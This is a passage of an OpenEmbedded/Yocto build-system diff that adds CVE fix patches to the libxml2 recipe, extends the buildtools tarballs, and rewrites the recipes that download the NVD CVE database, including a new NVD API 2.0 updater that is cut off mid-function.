+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ xmlreader.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/xmlreader.c b/xmlreader.c
+index 979385a13..fefd68e0b 100644
+--- a/xmlreader.c
++++ b/xmlreader.c
+@@ -1443,6 +1443,7 @@ node_found:
+      * Handle XInclude if asked for
+      */
+     if ((reader->xinclude) && (reader->in_xinclude == 0) &&
++        (reader->state != XML_TEXTREADER_BACKTRACK) &&
+         (reader->node != NULL) &&
+ 	(reader->node->type == XML_ELEMENT_NODE) &&
+ 	(reader->node->ns != NULL) &&
+-- 
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/runtest.patch b/meta/recipes-core/libxml/libxml2/runtest.patch
index 0dbb353c0f..c7a90cd3dc 100644
--- a/meta/recipes-core/libxml/libxml2/runtest.patch
+++ b/meta/recipes-core/libxml/libxml2/runtest.patch
@@ -1,28 +1,33 @@
-Add 'install-ptest' rule. Print a standard result line for
-each test.
+From 6172ccd1e74bc181f5298f19e240234e12876abe Mon Sep 17 00:00:00 2001
+From: Tony Tascioglu <tony.tascioglu@windriver.com>
+Date: Tue, 11 May 2021 11:57:46 -0400
+Subject: [PATCH] Add 'install-ptest' rule.
+
+Print a standard result line for each test.
 
 Signed-off-by: Mihaela Sendrea <mihaela.sendrea@enea.com>
 Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
-Upstream-Status: Backport
+Upstream-Status: Pending
 
 Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
+Signed-off-by: Tony Tascioglu <tony.tascioglu@windriver.com>
 ---
- Makefile.am   |   9 ++++
+ Makefile.am   |   9 +++
  runsuite.c    |   1 +
  runtest.c     |   2 +
  runxmlconf.c  |   1 +
- testapi.c     | 122 ++++++++++++++++++++++++++++++---------------
- testchar.c    | 156 +++++++++++++++++++++++++++++++++++++++++-----------------
+ testapi.c     | 122 ++++++++++++++++++++++++++-------------
+ testchar.c    | 156 +++++++++++++++++++++++++++++++++++---------------
  testdict.c    |   1 +
  testlimits.c  |   1 +
  testrecurse.c |   2 +
  9 files changed, 210 insertions(+), 85 deletions(-)
 
 diff --git a/Makefile.am b/Makefile.am
-index 9c630be..7cfd04b 100644
+index 05d1671f..ae622745 100644
 --- a/Makefile.am
 +++ b/Makefile.am
-@@ -202,6 +202,15 @@ runxmlconf_LDADD= $(LDADDS)
+@@ -198,6 +198,15 @@ runxmlconf_LDADD= $(LDADDS)
  #testOOM_DEPENDENCIES = $(DEPS)
  #testOOM_LDADD= $(LDADDS)
  
@@ -39,10 +44,10 @@ index 9c630be..7cfd04b 100644
            testchar$(EXEEXT) testdict$(EXEEXT) runxmlconf$(EXEEXT)
  	[ -d test   ] || $(LN_S) $(srcdir)/test   .
 diff --git a/runsuite.c b/runsuite.c
-index aaab13e..9ba2c5d 100644
+index d24b5ec3..f7ff2521 100644
 --- a/runsuite.c
 +++ b/runsuite.c
-@@ -1162,6 +1162,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
+@@ -1147,6 +1147,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
  
      if (logfile != NULL)
          fclose(logfile);
@@ -51,10 +56,10 @@ index aaab13e..9ba2c5d 100644
  }
  #else /* !SCHEMAS */
 diff --git a/runtest.c b/runtest.c
-index addda5c..8ba5d59 100644
+index ffa98d04..470f95cb 100644
 --- a/runtest.c
 +++ b/runtest.c
-@@ -4501,6 +4501,7 @@ launchTests(testDescPtr tst) {
+@@ -4508,6 +4508,7 @@ launchTests(testDescPtr tst) {
      xmlCharEncCloseFunc(ebcdicHandler);
      xmlCharEncCloseFunc(eucJpHandler);
  
@@ -62,7 +67,7 @@ index addda5c..8ba5d59 100644
      return(err);
  }
  
-@@ -4577,6 +4578,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
+@@ -4588,6 +4589,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
      xmlCleanupParser();
      xmlMemoryDump();
  
@@ -71,7 +76,7 @@ index addda5c..8ba5d59 100644
  }
  
 diff --git a/runxmlconf.c b/runxmlconf.c
-index cef20f4..4f291fb 100644
+index 70f61017..e882b3a1 100644
 --- a/runxmlconf.c
 +++ b/runxmlconf.c
 @@ -595,6 +595,7 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
@@ -83,7 +88,7 @@ index cef20f4..4f291fb 100644
  }
  
 diff --git a/testapi.c b/testapi.c
-index 4a751e2..7ccc066 100644
+index ff8b470d..52b51d78 100644
 --- a/testapi.c
 +++ b/testapi.c
 @@ -1246,49 +1246,91 @@ static int
@@ -219,7 +224,7 @@ index 4a751e2..7ccc066 100644
  }
  
 diff --git a/testchar.c b/testchar.c
-index 0d08792..f555d3b 100644
+index 6866a175..7bce0132 100644
 --- a/testchar.c
 +++ b/testchar.c
 @@ -23,7 +23,7 @@ static void errorHandler(void *unused, xmlErrorPtr err) {
@@ -797,7 +802,7 @@ index 0d08792..f555d3b 100644
      /*
       * Cleanup function for the XML library.
 diff --git a/testdict.c b/testdict.c
-index 40bebd0..114b934 100644
+index 40bebd05..114b9347 100644
 --- a/testdict.c
 +++ b/testdict.c
 @@ -440,5 +440,6 @@ int main(void)
@@ -808,7 +813,7 @@ index 40bebd0..114b934 100644
      return(ret);
  }
 diff --git a/testlimits.c b/testlimits.c
-index 68c94db..1584434 100644
+index 059116a6..f0bee68d 100644
 --- a/testlimits.c
 +++ b/testlimits.c
 @@ -1634,5 +1634,6 @@ main(int argc ATTRIBUTE_UNUSED, char **argv ATTRIBUTE_UNUSED) {
@@ -819,7 +824,7 @@ index 68c94db..1584434 100644
      return(ret);
  }
 diff --git a/testrecurse.c b/testrecurse.c
-index f95ae1c..74c8f8b 100644
+index 0cbe25a6..3ecadb40 100644
 --- a/testrecurse.c
 +++ b/testrecurse.c
 @@ -892,6 +892,7 @@ launchTests(testDescPtr tst) {
@@ -838,5 +843,5 @@ index f95ae1c..74c8f8b 100644
      return(ret);
  }
 -- 
-2.7.4
+2.25.1
 
diff --git a/meta/recipes-core/libxml/libxml2_2.9.10.bb b/meta/recipes-core/libxml/libxml2_2.9.10.bb
index 4ebfb9e556..72f830b6d3 100644
--- a/meta/recipes-core/libxml/libxml2_2.9.10.bb
+++ b/meta/recipes-core/libxml/libxml2_2.9.10.bb
@@ -1,6 +1,6 @@
 SUMMARY = "XML C Parser Library and Toolkit"
 DESCRIPTION = "The XML Parser Library allows for manipulation of XML files.  Libxml2 exports Push and Pull type parser interfaces for both XML and HTML.  It can do DTD validation at parse time, on a parsed document instance or with an arbitrary DTD.  Libxml2 includes complete XPath, XPointer and Xinclude implementations.  It also has a SAX like interface, which is designed to be compatible with Expat."
-HOMEPAGE = "http://www.xmlsoft.org/"
+HOMEPAGE = "https://gitlab.gnome.org/GNOME/libxml2"
 BUGTRACKER = "http://bugzilla.gnome.org/buglist.cgi?product=libxml2"
 SECTION = "libs"
 LICENSE = "MIT"
@@ -11,8 +11,9 @@ LIC_FILES_CHKSUM = "file://Copyright;md5=2044417e2e5006b65a8b9067b683fcf1 \
 
 DEPENDS = "zlib virtual/libiconv"
 
-SRC_URI = "http://www.xmlsoft.org/sources/libxml2-${PV}.tar.gz;name=libtar \
-           http://www.w3.org/XML/Test/xmlts20080827.tar.gz;subdir=${BP};name=testtar \
+inherit gnomebase
+
+SRC_URI += "http://www.w3.org/XML/Test/xmlts20080827.tar.gz;subdir=${BP};name=testtar \
            file://libxml-64bit.patch \
            file://runtest.patch \
            file://run-ptest \
@@ -23,10 +24,31 @@ SRC_URI = "http://www.xmlsoft.org/sources/libxml2-${PV}.tar.gz;name=libtar \
            file://CVE-2020-7595.patch \
            file://CVE-2019-20388.patch \
            file://CVE-2020-24977.patch \
+           file://CVE-2021-3517.patch \
+           file://CVE-2021-3537.patch \
+           file://CVE-2021-3518.patch \
+           file://CVE-2021-3541.patch \
+           file://CVE-2022-23308.patch \
+           file://CVE-2022-23308-fix-regression.patch \
+           file://CVE-2022-29824-dependent.patch \
+           file://CVE-2022-29824.patch \
+           file://0001-Port-gentest.py-to-Python-3.patch \
+           file://CVE-2016-3709.patch \
+           file://CVE-2022-40303.patch \
+           file://CVE-2022-40304.patch \
+           file://CVE-2023-28484.patch \
+           file://CVE-2023-29469.patch \
+           file://CVE-2023-39615-pre.patch \
+           file://CVE-2023-39615-0001.patch \
+           file://CVE-2023-39615-0002.patch \
+           file://CVE-2021-3516.patch \
+           file://CVE-2023-45322-1.patch \
+           file://CVE-2023-45322-2.patch \
+           file://CVE-2024-25062-pre1.patch \
+           file://CVE-2024-25062.patch \
            "
 
-SRC_URI[libtar.md5sum] = "10942a1dc23137a8aa07f0639cbfece5"
-SRC_URI[libtar.sha256sum] = "aafee193ffb8fe0c82d4afef6ef91972cbaf5feea100edc2f262750611b4be1f"
+SRC_URI[archive.sha256sum] = "593b7b751dd18c2d6abcd0c4bcb29efc203d0b4373a6df98e3a455ea74ae2813"
 SRC_URI[testtar.md5sum] = "ae3d1ebe000a3972afa104ca7f0e1b4a"
 SRC_URI[testtar.sha256sum] = "96151685cec997e1f9f3387e3626d61e6284d4d6e66e0e440c209286c03e9cc7"
 
@@ -40,9 +62,9 @@ PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6,"
 
 inherit autotools pkgconfig binconfig-disabled ptest features_check
 
-inherit ${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3native', '', d)}
+inherit ${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3targetconfig', '', d)}
 
-RDEPENDS_${PN}-ptest += "make ${@bb.utils.contains('PACKAGECONFIG', 'python', 'libgcc python3-core python3-logging python3-shell  python3-stringold python3-threading python3-unittest ${PN}-python', '', d)}"
+RDEPENDS_${PN}-ptest += "bash make ${@bb.utils.contains('PACKAGECONFIG', 'python', 'libgcc python3-core python3-logging python3-shell  python3-stringold python3-threading python3-unittest ${PN}-python', '', d)}"
 
 RDEPENDS_${PN}-python += "${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3-core', '', d)}"
 
@@ -81,6 +103,16 @@ do_configure_prepend () {
 }
 
 do_compile_ptest() {
+        # Make sure that testapi.c is newer than gentests.py, because
+        # with reproducible builds, they will both get e.g. Jan  1  1970
+        # modification time from SOURCE_DATE_EPOCH and then check-am
+        # might try to rebuild_testapi, which will fail even with
+        # 0001-Port-gentest.py-to-Python-3.patch, because it needs
+        # libxml2 module (libxml2-native dependency and correctly
+        # set PYTHON_SITE_PACKAGES), it's easier to
+        # just rely on pre-generated testapi.c from the release
+        touch ${S}/testapi.c
+
 	oe_runmake check-am
 }
 
diff --git a/meta/recipes-core/meta/buildtools-extended-tarball.bb b/meta/recipes-core/meta/buildtools-extended-tarball.bb
index c32d0107c3..83e3fddccc 100644
--- a/meta/recipes-core/meta/buildtools-extended-tarball.bb
+++ b/meta/recipes-core/meta/buildtools-extended-tarball.bb
@@ -28,8 +28,21 @@ TOOLCHAIN_HOST_TASK += "\
     nativesdk-libtool \
     nativesdk-pkgconfig \
     nativesdk-glibc-utils \
+    nativesdk-glibc-gconv-ibm850 \
+    nativesdk-glibc-gconv-iso8859-1 \
+    nativesdk-glibc-gconv-utf-16 \
+    nativesdk-glibc-gconv-cp1250 \
+    nativesdk-glibc-gconv-cp1251 \
+    nativesdk-glibc-gconv-cp1252 \
+    nativesdk-glibc-gconv-euc-jp \
+    nativesdk-glibc-gconv-libjis \
     nativesdk-libxcrypt-dev \
+    nativesdk-parted \
+    nativesdk-dosfstools \
+    nativesdk-gptfdisk \
     "
+# gconv-cp1250, cp1251 and euc-jp needed for iconv to work in vim builds
+# also copied list from uninative
 
 TOOLCHAIN_OUTPUTNAME = "${SDK_ARCH}-buildtools-extended-nativesdk-standalone-${DISTRO_VERSION}"
 
diff --git a/meta/recipes-core/meta/buildtools-tarball.bb b/meta/recipes-core/meta/buildtools-tarball.bb
index 434ffdc334..24f5f28589 100644
--- a/meta/recipes-core/meta/buildtools-tarball.bb
+++ b/meta/recipes-core/meta/buildtools-tarball.bb
@@ -66,7 +66,7 @@ create_sdk_files_append () {
 	# Generate new (mini) sdk-environment-setup file
 	script=${1:-${SDK_OUTPUT}/${SDKPATH}/environment-setup-${SDK_SYS}}
 	touch $script
-	echo 'export PATH=${SDKPATHNATIVE}${bindir_nativesdk}:$PATH' >> $script
+	echo 'export PATH="${SDKPATHNATIVE}${bindir_nativesdk}:${SDKPATHNATIVE}${sbindir_nativesdk}:${SDKPATHNATIVE}${base_bindir_nativesdk}:${SDKPATHNATIVE}${base_sbindir_nativesdk}:$PATH"' >> $script
 	echo 'export OECORE_NATIVE_SYSROOT="${SDKPATHNATIVE}"' >> $script
 	echo 'export GIT_SSL_CAINFO="${SDKPATHNATIVE}${sysconfdir}/ssl/certs/ca-certificates.crt"' >>$script
 	echo 'export SSL_CERT_FILE="${SDKPATHNATIVE}${sysconfdir}/ssl/certs/ca-certificates.crt"' >>$script
diff --git a/meta/recipes-core/meta/cve-update-db-native.bb b/meta/recipes-core/meta/cve-update-db-native.bb
index 0cd3a1c153..efc32470d3 100644
--- a/meta/recipes-core/meta/cve-update-db-native.bb
+++ b/meta/recipes-core/meta/cve-update-db-native.bb
@@ -12,28 +12,76 @@ deltask do_compile
 deltask do_install
 deltask do_populate_sysroot
 
+# CVE database update interval, in seconds. By default: once a day (24*60*60).
+# Use 0 to force the update
+# Use a negative value to skip the update
+CVE_DB_UPDATE_INTERVAL ?= "86400"
+
+# Timeout for blocking socket operations, such as the connection attempt.
+CVE_SOCKET_TIMEOUT ?= "60"
+NVDCVE_URL ?= "https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-"
+
+CVE_DB_TEMP_FILE ?= "${CVE_CHECK_DB_DIR}/temp_nvdcve_1.1.db"
+
 python () {
     if not bb.data.inherits_class("cve-check", d):
         raise bb.parse.SkipRecipe("Skip recipe when cve-check class is not loaded.")
 }
 
-python do_populate_cve_db() {
+python do_fetch() {
     """
     Update NVD database with json data feed
     """
     import bb.utils
     import bb.progress
-    import sqlite3, urllib, urllib.parse, shutil, gzip
-    from datetime import date
+    import shutil
 
     bb.utils.export_proxies(d)
 
-    BASE_URL = "https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-"
-    YEAR_START = 2002
-
     db_file = d.getVar("CVE_CHECK_DB_FILE")
     db_dir = os.path.dirname(db_file)
+    db_tmp_file = d.getVar("CVE_DB_TEMP_FILE")
+
+    cleanup_db_download(db_file, db_tmp_file)
+
+    # The NVD database changes once a day, so no need to update more frequently
+    # Allow the user to force-update
+    try:
+        import time
+        update_interval = int(d.getVar("CVE_DB_UPDATE_INTERVAL"))
+        if update_interval < 0:
+            bb.note("CVE database update skipped")
+            return
+        if time.time() - os.path.getmtime(db_file) < update_interval:
+            return
 
+    except OSError:
+        pass
+
+    bb.utils.mkdirhier(db_dir)
+    if os.path.exists(db_file):
+        shutil.copy2(db_file, db_tmp_file)
+
+    if update_db_file(db_tmp_file, d) == True:
+        # Update downloaded correctly, can swap files
+        shutil.move(db_tmp_file, db_file)
+    else:
+        # Update failed, do not modify the database
+        bb.note("CVE database update failed")
+        os.remove(db_tmp_file)
+}
+
+do_fetch[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}"
+do_fetch[file-checksums] = ""
+do_fetch[vardeps] = ""
+
+def cleanup_db_download(db_file, db_tmp_file):
+    """
+    Cleanup the download space from possible failed downloads
+    """
+
+    # Clean up the updates done on the main file
+    # Remove it only if a journal file exists - it means a complete re-download
     if os.path.exists("{0}-journal".format(db_file)):
         # If a journal is present the last update might have been interrupted. In that case,
         # just wipe any leftovers and force the DB to be recreated.
@@ -42,37 +90,50 @@ python do_populate_cve_db() {
         if os.path.exists(db_file):
             os.remove(db_file)
 
-    # Don't refresh the database more than once an hour
-    try:
-        import time
-        if time.time() - os.path.getmtime(db_file) < (60*60):
-            return
-    except OSError:
-        pass
+    # Clean-up the temporary file downloads, we can remove both journal
+    # and the temporary database
+    if os.path.exists("{0}-journal".format(db_tmp_file)):
+        # If a journal is present the last update might have been interrupted. In that case,
+        # just wipe any leftovers and force the DB to be recreated.
+        os.remove("{0}-journal".format(db_tmp_file))
 
-    bb.utils.mkdirhier(db_dir)
+    if os.path.exists(db_tmp_file):
+        os.remove(db_tmp_file)
 
-    # Connect to database
-    conn = sqlite3.connect(db_file)
-    c = conn.cursor()
+def update_db_file(db_tmp_file, d):
+    """
+    Update the given database file
+    """
+    import bb.utils, bb.progress
+    from datetime import date
+    import urllib, gzip, sqlite3
+
+    YEAR_START = 2002
+    cve_socket_timeout = int(d.getVar("CVE_SOCKET_TIMEOUT"))
 
-    initialize_db(c)
+    # Connect to database
+    conn = sqlite3.connect(db_tmp_file)
+    initialize_db(conn)
 
     with bb.progress.ProgressHandler(d) as ph, open(os.path.join(d.getVar("TMPDIR"), 'cve_check'), 'a') as cve_f:
         total_years = date.today().year + 1 - YEAR_START
         for i, year in enumerate(range(YEAR_START, date.today().year + 1)):
+            bb.debug(2, "Updating %d" % year)
             ph.update((float(i + 1) / total_years) * 100)
-            year_url = BASE_URL + str(year)
+            year_url = (d.getVar('NVDCVE_URL')) + str(year)
             meta_url = year_url + ".meta"
             json_url = year_url + ".json.gz"
 
             # Retrieve meta last modified date
             try:
-                response = urllib.request.urlopen(meta_url)
+                response = urllib.request.urlopen(meta_url, timeout=cve_socket_timeout)
             except urllib.error.URLError as e:
                 cve_f.write('Warning: CVE db update error, Unable to fetch CVE data.\n\n')
-                bb.warn("Failed to fetch CVE data (%s)" % e.reason)
-                return
+                bb.warn("Failed to fetch CVE data (%s)" % e)
+                import socket
+                result = socket.getaddrinfo("nvd.nist.gov", 443, proto=socket.IPPROTO_TCP)
+                bb.warn("Host IPs are %s" % (", ".join(t[4][0] for t in result)))
+                return False
 
             if response:
                 for l in response.read().decode("utf-8").splitlines():
@@ -82,64 +143,81 @@ python do_populate_cve_db() {
                         break
                 else:
                     bb.warn("Cannot parse CVE metadata, update failed")
-                    return
+                    return False
 
             # Compare with current db last modified date
-            c.execute("select DATE from META where YEAR = ?", (year,))
-            meta = c.fetchone()
+            cursor = conn.execute("select DATE from META where YEAR = ?", (year,))
+            meta = cursor.fetchone()
+            cursor.close()
+
             if not meta or meta[0] != last_modified:
+                bb.debug(2, "Updating entries")
                 # Clear products table entries corresponding to current year
-                c.execute("delete from PRODUCTS where ID like ?", ('CVE-%d%%' % year,))
+                conn.execute("delete from PRODUCTS where ID like ?", ('CVE-%d%%' % year,)).close()
 
                 # Update db with current year json file
                 try:
-                    response = urllib.request.urlopen(json_url)
+                    response = urllib.request.urlopen(json_url, timeout=cve_socket_timeout)
                     if response:
-                        update_db(c, gzip.decompress(response.read()).decode('utf-8'))
-                    c.execute("insert or replace into META values (?, ?)", [year, last_modified])
+                        update_db(conn, gzip.decompress(response.read()).decode('utf-8'))
+                    conn.execute("insert or replace into META values (?, ?)", [year, last_modified]).close()
                 except urllib.error.URLError as e:
                     cve_f.write('Warning: CVE db update error, CVE data is outdated.\n\n')
                     bb.warn("Cannot parse CVE data (%s), update failed" % e.reason)
-                    return
-
+                    return False
+            else:
+                bb.debug(2, "Already up to date (last modified %s)" % last_modified)
             # Update success, set the date to cve_check file.
             if year == date.today().year:
                 cve_f.write('CVE database update : %s\n\n' % date.today())
 
         conn.commit()
         conn.close()
-}
+        return True
 
-do_populate_cve_db[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}"
+def initialize_db(conn):
+    with conn:
+        c = conn.cursor()
 
-def initialize_db(c):
-    c.execute("CREATE TABLE IF NOT EXISTS META (YEAR INTEGER UNIQUE, DATE TEXT)")
+        c.execute("CREATE TABLE IF NOT EXISTS META (YEAR INTEGER UNIQUE, DATE TEXT)")
 
-    c.execute("CREATE TABLE IF NOT EXISTS NVD (ID TEXT UNIQUE, SUMMARY TEXT, \
-        SCOREV2 TEXT, SCOREV3 TEXT, MODIFIED INTEGER, VECTOR TEXT)")
+        c.execute("CREATE TABLE IF NOT EXISTS NVD (ID TEXT UNIQUE, SUMMARY TEXT, \
+            SCOREV2 TEXT, SCOREV3 TEXT, MODIFIED INTEGER, VECTOR TEXT)")
 
-    c.execute("CREATE TABLE IF NOT EXISTS PRODUCTS (ID TEXT, \
-        VENDOR TEXT, PRODUCT TEXT, VERSION_START TEXT, OPERATOR_START TEXT, \
-        VERSION_END TEXT, OPERATOR_END TEXT)")
-    c.execute("CREATE INDEX IF NOT EXISTS PRODUCT_ID_IDX on PRODUCTS(ID);")
+        c.execute("CREATE TABLE IF NOT EXISTS PRODUCTS (ID TEXT, \
+            VENDOR TEXT, PRODUCT TEXT, VERSION_START TEXT, OPERATOR_START TEXT, \
+            VERSION_END TEXT, OPERATOR_END TEXT)")
+        c.execute("CREATE INDEX IF NOT EXISTS PRODUCT_ID_IDX on PRODUCTS(ID);")
 
-def parse_node_and_insert(c, node, cveId):
+        c.close()
+
+def parse_node_and_insert(conn, node, cveId):
     # Parse children node if needed
     for child in node.get('children', ()):
-        parse_node_and_insert(c, child, cveId)
+        parse_node_and_insert(conn, child, cveId)
 
     def cpe_generator():
         for cpe in node.get('cpe_match', ()):
             if not cpe['vulnerable']:
                 return
-            cpe23 = cpe['cpe23Uri'].split(':')
+            cpe23 = cpe.get('cpe23Uri')
+            if not cpe23:
+                return
+            cpe23 = cpe23.split(':')
+            if len(cpe23) < 6:
+                return
             vendor = cpe23[3]
             product = cpe23[4]
             version = cpe23[5]
 
+            if cpe23[6] == '*' or cpe23[6] == '-':
+                version_suffix = ""
+            else:
+                version_suffix = "_" + cpe23[6]
+
             if version != '*' and version != '-':
                 # Version is defined, this is a '=' match
-                yield [cveId, vendor, product, version, '=', '', '']
+                yield [cveId, vendor, product, version + version_suffix, '=', '', '']
             elif version == '-':
                 # no version information is available
                 yield [cveId, vendor, product, version, '', '', '']
@@ -166,11 +244,16 @@ def parse_node_and_insert(c, node, cveId):
                     op_end = '<'
                     v_end = cpe['versionEndExcluding']
 
-                yield [cveId, vendor, product, v_start, op_start, v_end, op_end]
+                if op_start or op_end or v_start or v_end:
+                    yield [cveId, vendor, product, v_start, op_start, v_end, op_end]
+                else:
+                    # This is no version information, expressed differently.
+                    # Save processing by representing as -.
+                    yield [cveId, vendor, product, '-', '', '', '']
 
-    c.executemany("insert into PRODUCTS values (?, ?, ?, ?, ?, ?, ?)", cpe_generator())
+    conn.executemany("insert into PRODUCTS values (?, ?, ?, ?, ?, ?, ?)", cpe_generator()).close()
 
-def update_db(c, jsondata):
+def update_db(conn, jsondata):
     import json
     root = json.loads(jsondata)
 
@@ -194,15 +277,14 @@ def update_db(c, jsondata):
             accessVector = accessVector or "UNKNOWN"
             cvssv3 = 0.0
 
-        c.execute("insert or replace into NVD values (?, ?, ?, ?, ?, ?)",
-                [cveId, cveDesc, cvssv2, cvssv3, date, accessVector])
+        conn.execute("insert or replace into NVD values (?, ?, ?, ?, ?, ?)",
+                [cveId, cveDesc, cvssv2, cvssv3, date, accessVector]).close()
 
         configurations = elt['configurations']['nodes']
         for config in configurations:
-            parse_node_and_insert(c, config, cveId)
+            parse_node_and_insert(conn, config, cveId)
 
 
-addtask do_populate_cve_db before do_fetch
-do_populate_cve_db[nostamp] = "1"
+do_fetch[nostamp] = "1"
 
 EXCLUDE_FROM_WORLD = "1"
diff --git a/meta/recipes-core/meta/cve-update-nvd2-native.bb b/meta/recipes-core/meta/cve-update-nvd2-native.bb
new file mode 100644
index 0000000000..1a3eeba6d0
--- /dev/null
+++ b/meta/recipes-core/meta/cve-update-nvd2-native.bb
@@ -0,0 +1,372 @@
+SUMMARY = "Updates the NVD CVE database"
+LICENSE = "MIT"
+
+# Important note:
+# This product uses the NVD API but is not endorsed or certified by the NVD.
+
+INHIBIT_DEFAULT_DEPS = "1"
+
+inherit native
+
+deltask do_unpack
+deltask do_patch
+deltask do_configure
+deltask do_compile
+deltask do_install
+deltask do_populate_sysroot
+
+NVDCVE_URL ?= "https://services.nvd.nist.gov/rest/json/cves/2.0"
+
+# If you have a NVD API key (https://nvd.nist.gov/developers/request-an-api-key)
+# then setting this to get higher rate limits.
+NVDCVE_API_KEY ?= ""
+
+# CVE database update interval, in seconds. By default: once a day (24*60*60).
+# Use 0 to force the update
+# Use a negative value to skip the update
+CVE_DB_UPDATE_INTERVAL ?= "86400"
+
+# CVE database incremental update age threshold, in seconds. If the database is
+# older than this threshold, do a full re-download, else, do an incremental
+# update. By default: the maximum allowed value from NVD: 120 days (120*24*60*60)
+# Use 0 to force a full download.
+CVE_DB_INCR_UPDATE_AGE_THRES ?= "10368000"
+
+# Number of attempts for each http query to nvd server before giving up
+CVE_DB_UPDATE_ATTEMPTS ?= "5"
+
+CVE_DB_TEMP_FILE ?= "${CVE_CHECK_DB_DIR}/temp_nvdcve_2.db"
+
+python () {
+    if not bb.data.inherits_class("cve-check", d):
+        raise bb.parse.SkipRecipe("Skip recipe when cve-check class is not loaded.")
+}
+
+python do_fetch() {
+    """
+    Update NVD database with API 2.0
+    """
+    import bb.utils
+    import bb.progress
+    import shutil
+
+    bb.utils.export_proxies(d)
+
+    db_file = d.getVar("CVE_CHECK_DB_FILE")
+    db_dir = os.path.dirname(db_file)
+    db_tmp_file = d.getVar("CVE_DB_TEMP_FILE")
+
+    cleanup_db_download(db_file, db_tmp_file)
+    # By default let's update the whole database (since time 0)
+    database_time = 0
+
+    # The NVD database changes once a day, so no need to update more frequently
+    # Allow the user to force-update
+    try:
+        import time
+        update_interval = int(d.getVar("CVE_DB_UPDATE_INTERVAL"))
+        if update_interval < 0:
+            bb.note("CVE database update skipped")
+            return
+        if time.time() - os.path.getmtime(db_file) < update_interval:
+            bb.note("CVE database recently updated, skipping")
+            return
+        database_time = os.path.getmtime(db_file)
+
+    except OSError:
+        pass
+
+    bb.utils.mkdirhier(db_dir)
+    if os.path.exists(db_file):
+        shutil.copy2(db_file, db_tmp_file)
+
+    if update_db_file(db_tmp_file, d, database_time) == True:
+        # Update downloaded correctly, can swap files
+        shutil.move(db_tmp_file, db_file)
+    else:
+        # Update failed, do not modify the database
+        bb.warn("CVE database update failed")
+        os.remove(db_tmp_file)
+}
+
+do_fetch[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}"
+do_fetch[file-checksums] = ""
+do_fetch[vardeps] = ""
+
+def cleanup_db_download(db_file, db_tmp_file):
+    """
+    Cleanup the download space from possible failed downloads
+    """
+
+    # Clean up the updates done on the main file
+    # Remove it only if a journal file exists - it means a complete re-download
+    if os.path.exists("{0}-journal".format(db_file)):
+        # If a journal is present the last update might have been interrupted. In that case,
+        # just wipe any leftovers and force the DB to be recreated.
+        os.remove("{0}-journal".format(db_file))
+
+        if os.path.exists(db_file):
+            os.remove(db_file)
+
+    # Clean-up the temporary file downloads, we can remove both journal
+    # and the temporary database
+    if os.path.exists("{0}-journal".format(db_tmp_file)):
+        # If a journal is present the last update might have been interrupted. In that case,
+        # just wipe any leftovers and force the DB to be recreated.
+        os.remove("{0}-journal".format(db_tmp_file))
+
+    if os.path.exists(db_tmp_file):
+        os.remove(db_tmp_file)
+
+def nvd_request_wait(attempt, min_wait):
+    return min ( ( (2 * attempt) + min_wait ) , 30)
+
+def nvd_request_next(url, attempts, api_key, args, min_wait):
+    """
+    Request next part of the NVD database
+    NVD API documentation: https://nvd.nist.gov/developers/vulnerabilities
+    """
+
+    import urllib.request
+    import urllib.parse
+    import gzip
+    import http
+    import time
+
+    request = urllib.request.Request(url + "?" + urllib.parse.urlencode(args))
+    if api_key:
+        request.add_header("apiKey", api_key)
+    bb.note("Requesting %s" % request.full_url)
+
+    for attempt in range(attempts):
+        try:
+            r = urllib.request.urlopen(request)
+
+            if (r.headers['content-encoding'] == 'gzip'):
+                buf = r.read()
+                raw_data = gzip.decompress(buf).decode("utf-8")
+            else:
+                raw_data = r.read().decode("utf-8")
+
+            r.close()
+
+        except Exception as e:
+            wait_time = nvd_request_wait(attempt, min_wait)
+            bb.note("CVE database: received error (%s)" % (e))
+            bb.note("CVE database: retrying download after %d seconds. attempted (%d/%d)" % (wait_time, attempt+1, attempts))
+            time.sleep(wait_time)
+            pass
+        else:
+            return raw_data
+    else:
+        # We failed at all attempts
+        return None
+
+def update_db_file(db_tmp_file, d, database_time):
+    """
+    Update the given database file
+    """
+    import bb.utils, bb.progress
+    import datetime
+    import sqlite3
+    import json
+
+    # Connect to database
+    conn = sqlite3.connect(db_tmp_file)
+    initialize_db(conn)
+
+    req_args = {'startIndex' : 0}
+
+    incr_update_threshold = int(d.getVar("CVE_DB_INCR_UPDATE_AGE_THRES"))
+    if database_time != 0:
+        database_date = datetime.datetime.fromtimestamp(database_time, tz=datetime.timezone.utc)
+        today_date = datetime.datetime.now(tz=datetime.timezone.utc)
+        delta = today_date - database_date
+        if incr_update_threshold == 0:
+            bb.note("CVE database: forced full update")
+        elif delta < datetime.timedelta(seconds=incr_update_threshold):
+            bb.note("CVE database: performing partial update")
+            # The maximum range for time is 120 days
+            if delta > datetime.timedelta(days=120):
+                bb.error("CVE database: Trying to do an incremental update on a larger than supported range")
+            req_args['lastModStartDate'] = database_date.isoformat()
+            req_args['lastModEndDate'] = today_date.isoformat()
+        else:
+            bb.note("CVE database: file too old, forcing a full update")
+    else:
+        bb.note("CVE database: no preexisting database, do a full download")
+
+    with bb.progress.ProgressHandler(d) as ph, open(os.path.join(d.getVar("TMPDIR"), 'cve_check'), 'a') as cve_f:
+
+        bb.note("Updating entries")
+        index = 0
+        url = d.getVar("NVDCVE_URL")
+        api_key = d.getVar("NVDCVE_API_KEY") or None
